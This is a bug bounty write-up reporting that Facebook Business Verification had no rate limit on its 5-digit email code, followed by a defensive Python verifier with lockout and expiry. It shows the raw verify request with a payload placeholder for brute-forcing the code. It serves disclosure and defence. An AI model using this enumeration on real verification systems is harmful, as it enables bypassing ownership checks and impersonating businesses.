Absence of Rate Limit in Facebook Business Verification ($2000 Bounty)
Facebook Business Verification is crucial for establishing the authenticity of users and businesses on the platform. By verifying their businesses, users gain access to features and permissions that enable interactions with other businesses and their data.
During my testing, I identified a rate-limiting issue within the business verification process. Specifically, when a user was required to enter a 5-digit code received via email, there was no effective rate limit in place. This oversight allowed me to exploit the vulnerability by attempting to brute-force the code without the server blocking my IP address.
POST Request
```http
POST /business_verification/challenge/verify/ HTTP/1.1
Host: business.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://business.facebook.com/settings/security/business_verification?business_id=xxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 520
Connection: close
Cookie: // User cookie

submission_id=xxxxxxxxxxx&challenge_code=<Payload>&challenge_type=email&indexed_id&__user=xxxxxxxxxxxxx&__a=1&__dyn=7xeUmFoO2CeCExUS2qq7E-8GAdyedKnFwn8eVEpyA5EK32q1oxy5Qdgdp98SmaDxW4E8U6ydwJyFEeo8p8-cx210wExuEixycx68w825ocEixWq1owvo7OqbwOzXwKzUeA9wRyUvyolyU6XximbDxeiUdo62iczErK2x0ZxzyGw8nz8a84q1UKh7wg8OqawywWg8oty88E4u2l2Utgvx-6U4a78K0AEbGg9ojwgEmy8eE&__req=y&__be=1&__pc=PHASED%3Abrands_pkg&dpr=1&__rev=1000997435&__s=%3Aen9sbg%3Axzvz6h&__hsi=6719306340508947313-0&fb_dtsg=AQFxSKvkuzNy%3AAQGIG2HsP1Ju&jazoest=22133
```
As I experimented with the request, I noticed that altering the parameters led to different error messages. After removing the “__req=y&__be=1” parameter, I discovered that the error message changed to “You have entered the wrong code! Please try again!” Realizing the significance of this finding, I promptly reported the issue to Facebook’s security team, who confirmed its validity.
Impact
A 5-digit numeric code has at most 100,000 possible values, so without a limit on failed attempts the code can be enumerated. Exploiting this vulnerability would enable an attacker to bypass email verification and potentially create fake business accounts using legitimate email addresses of business owners.
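The fix for this class of bug is server-side: bound the number of wrong guesses a single challenge will accept, expire the code, and compare it in constant time. The following is an added example of such a verifier written for this write-up; it is not Facebook's code, and the `VerificationStore` class, the `submission_id` keying and the limits (`MAX_ATTEMPTS`, `CODE_TTL_SECONDS`) are assumptions chosen for illustration.

```python
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict

MAX_ATTEMPTS = 5         # assumed: wrong guesses allowed per issued code
CODE_TTL_SECONDS = 600   # assumed: a code is valid for 10 minutes
CODE_DIGITS = 5          # matches the 5-digit email code in the report


@dataclass
class Challenge:
    code: str
    issued_at: float
    failed_attempts: int = 0


class VerificationStore:
    """Hypothetical in-memory challenge store keyed by submission_id.

    A real deployment would keep this state in a shared database or cache so
    the limit holds across web servers; the clock is injectable for testing.
    """

    def __init__(self, clock: Callable[[], float] = time.time):
        self._clock = clock
        self._challenges: Dict[str, Challenge] = {}

    def issue(self, submission_id: str) -> str:
        # Fresh code from a CSPRNG; it is sent to the business owner's email
        # and must never be returned to the browser.
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._challenges[submission_id] = Challenge(code=code, issued_at=self._clock())
        return code

    def verify(self, submission_id: str, submitted: str) -> str:
        ch = self._challenges.get(submission_id)
        if ch is None:
            return "no_active_challenge"
        if self._clock() - ch.issued_at > CODE_TTL_SECONDS:
            del self._challenges[submission_id]
            return "expired"
        # Once the budget is spent, even the correct code is rejected; the
        # user has to request a new code, which resets the attacker's progress.
        if ch.failed_attempts >= MAX_ATTEMPTS:
            return "locked"
        # Constant-time comparison avoids leaking matching prefixes via timing.
        if hmac.compare_digest(ch.code.encode(), submitted.strip().encode()):
            del self._challenges[submission_id]   # single use
            return "verified"
        ch.failed_attempts += 1
        if ch.failed_attempts >= MAX_ATTEMPTS:
            return "locked"
        return "wrong_code"


def demo() -> Dict[str, list]:
    """Shows the three outcomes on constructed input: lockout, success, expiry."""
    now = [1_000.0]
    store = VerificationStore(clock=lambda: now[0])

    # 1. Repeated wrong guesses lock the challenge; the right code no longer works.
    code = store.issue("sub-1")
    wrong = "00000" if code != "00000" else "00001"
    lockout = [store.verify("sub-1", wrong) for _ in range(MAX_ATTEMPTS)]
    lockout.append(store.verify("sub-1", code))

    # 2. Correct code on the first try succeeds exactly once.
    code = store.issue("sub-2")
    success = [store.verify("sub-2", code), store.verify("sub-2", code)]

    # 3. A code older than the TTL is refused even if correct.
    code = store.issue("sub-3")
    now[0] += CODE_TTL_SECONDS + 1
    expiry = [store.verify("sub-3", code)]

    return {"lockout": lockout, "success": success, "expiry": expiry}


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

The limit is tied to the challenge rather than to the client's IP address, so it cannot be sidestepped by rotating source addresses, and the error message for a wrong code stays the same before and after the lock so the endpoint does not reveal how close a guess was.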
Timeline
- July 30, 2019: Report submitted
- July 30, 2019: Triage
- April 15, 2020: Issue resolved, and $2000 bounty awarded